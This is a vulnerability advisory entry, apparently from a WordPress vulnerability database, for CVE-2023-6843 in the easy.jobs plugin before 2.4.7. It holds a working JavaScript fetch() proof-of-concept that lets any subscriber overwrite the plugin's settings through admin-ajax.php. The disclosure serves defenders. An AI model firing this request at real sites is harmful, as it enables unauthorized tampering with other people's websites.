Lucene search
Krzysztof Zając (CERT PL)WPEX-ID:41508340-8CAF-4DCA-BD88-350B63B78AB0HistoryDec 22, 2023 - 12:00 a.m.
easy.jobs < 2.4.7 - Subscriber+ Arbitrary Settings Update
2023-12-2200:00:00
Krzysztof Zając (CERT PL)
37
easy.jobs security
version 2.4.7
subscriber+ exploit
admin-ajax.php
arbitrary settings update
multi-part form data
security vulnerability
Description The plugin does not properly secure some of its AJAX actions, allowing any logged-in users to modify its settings.
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "multipart/form-data; boundary=----WebKitFormBoundaryvEIqF0bdJXlPN58D",
},
"body": "------WebKitFormBoundaryvEIqF0bdJXlPN58D\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\neasyjobs_save_basic_info\r\n------WebKitFormBoundaryvEIqF0bdJXlPN58D\r\nContent-Disposition: form-data; name=\"form_data\"\r\n\r\n{\"company\":{\"name\":\"hehehehe\",\"username\":\"xx\",\"mobile_number\":\"999999999\",\"company_type\":{\"id\":60,\"name\":\"Accounting & Finance\"},\"website\":\"https://sdsada.adsa\",\"company_size\":1,\"description\":\"\",\"benefits\":\"\",\"show_explore_company\":true,\"show_job_filter\":false,\"show_location_filter\":[],\"jobs_per_page\":\"\",\"show_location\":false,\"show_city\":false,\"show_state\":false,\"show_country\":false},\"companyAddress\":{\"postal_code\":\"\"},\"lang\":{\"image\":\"/app-easy-jobs/img/languages/004-united-states-of-america.svg\",\"name\":\"English\",\"code\":\"en\",\"extra\":\"\"}}\r\n------WebKitFormBoundaryvEIqF0bdJXlPN58D--\r\n",
"method": "POST"
});Related
wpvulndb
wpvulndb
easy.jobs < 2.4.7 - Subscriber+ Arbitrary Settings Update
2023-12-22 00:00:00
cve
cve
CVE-2023-6843
2024-01-15 16:15:12
prion
prion
Design/Logic Flaw
2024-01-15 16:15:00
cvelist
cvelist
CVE-2023-6843 easy.jobs < 2.4.7 - Subscriber+ Arbitrary Settings Update
2024-01-15 15:10:39
nvd
nvd
CVE-2023-6843
2024-01-15 16:15:12
6.7 Medium
AI Score
Confidence
Low
0.0004 Low
EPSS
Percentile
14.1%
Related for WPEX-ID:41508340-8CAF-4DCA-BD88-350B63B78AB0